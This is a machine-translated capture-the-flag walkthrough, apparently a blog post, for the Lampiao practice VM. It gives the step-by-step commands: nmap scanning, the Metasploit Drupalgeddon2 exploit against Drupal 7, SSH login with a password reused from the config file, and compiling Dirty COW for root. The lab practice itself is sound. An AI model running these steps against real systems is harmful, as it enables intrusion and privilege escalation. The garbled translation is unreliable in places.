In Lampiao osmosis, drupal getshell 7 vulnerabilities worthy of further study, you can have the opportunity to reproduce, look at the principle; the drone was used to practice dirty cattle extract it. . .
Drone ip:192.168.8.136
Full nmap port scan
nmap -sS -Pn -A -p- -n 192.168.8.136 
1898 is a web service with 80 ports, 80 of the web's nothing, go directly to it in 1898. . .
drupal 7 vulnerabilities getshell
In http://192.168.8.136:1898/robots.txtmany sensitive directory
http://192.168.8.136:1898/?q=admin/
http://192.168.8.136:1898/?q=user ..... Too much information is very desperate, Wappalyzer display the web using drupal cms station 7
This cms found some loopholes, really a lot, there are vulnerabilities CVE numbers, kali direct search on just fine, CVE-2018-7600
Encounter some problems, update the following msf5 (refer https://www.jianshu.com/p/0f12828d20c2 ), and then search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS 192.168.8.136
set RPORT 1898
exploit
Direct scored shell:
ssh login tiago
Switching to python / bin / bash:
python -c 'import pty;pty.spawn("/bin/bash")'
Browse the root directory and found a lot of strange file
Piece of audio:
http://192.168.8.136:1898/audio.m4a
Heard: user tiagothe user is tiago? ? ?
There is also a http://192.168.8.136:1898/LuizGonzaga-LampiaoFalou.mp3song: ,? ? ! ! ? ? What stuff? ? ?
General site profile database, configuration information to try to find drupal website
There setting.php in the default configuration file in the default directory sites
You can see the user's database, password:
'username' => 'drupaluser'
'password' => 'Virgulino'
Login decisive database:
mysql -u drupaluser -p
There are tables in drupal database user, the first user is tiago, password md5 solution does not come out. . .
General webmaster should be able to ssh access to the server
ssh board about tiago, password first with Virgulino, not burst again hydra
ssh tiago@192.168.8.136 
The login is successful, then lifted weights
Dirty cattle extract
View drone kernel:
lsb_release -a
uname -a
16 years, first try dirty cattle, not to say
Script mention the right of 40847.cpp
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp ~
After the drone written in a writable directory, compile and run
vim dirtycow.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dirtycow dirtycow.cpp -lutil
参数解释:
1. -Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
2. -pedantic 允许发出ANSI/ISO C标准所列出的所有警告
3. -O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
4. -std=c++11就是用按C++2011标准来编译的 5. -pthread 在Linux中要用到多线程时,需要链接pthread库 6. -o dcow gcc生成的目标文件,名字为dcow Mention the right to perform
./dirtycow -s
Get flag
flag:
9740616875908d91ddcdaa8aea3af366
to sum up
1, CMS WEB establishment of the system of drones is drupal 7, always pay attention to some of the loopholes cms
2, in the absence of ideas, try yourself! Often have different harvest
3, then practice your dirty cattle mention the right. . .
Lampiao drone Baidu cloud download
link: https://pan.baidu.com/s/1_TDcubSNj7z5JweaTxjgKQ
extraction code: g3fn
Author: City man strong
link: https: //www.jianshu.com/p/ce319b350885
Source: Jane book
Jane book copyright reserved by the authors, are reproduced in any form, please contact the author to obtain authorization and indicate the source.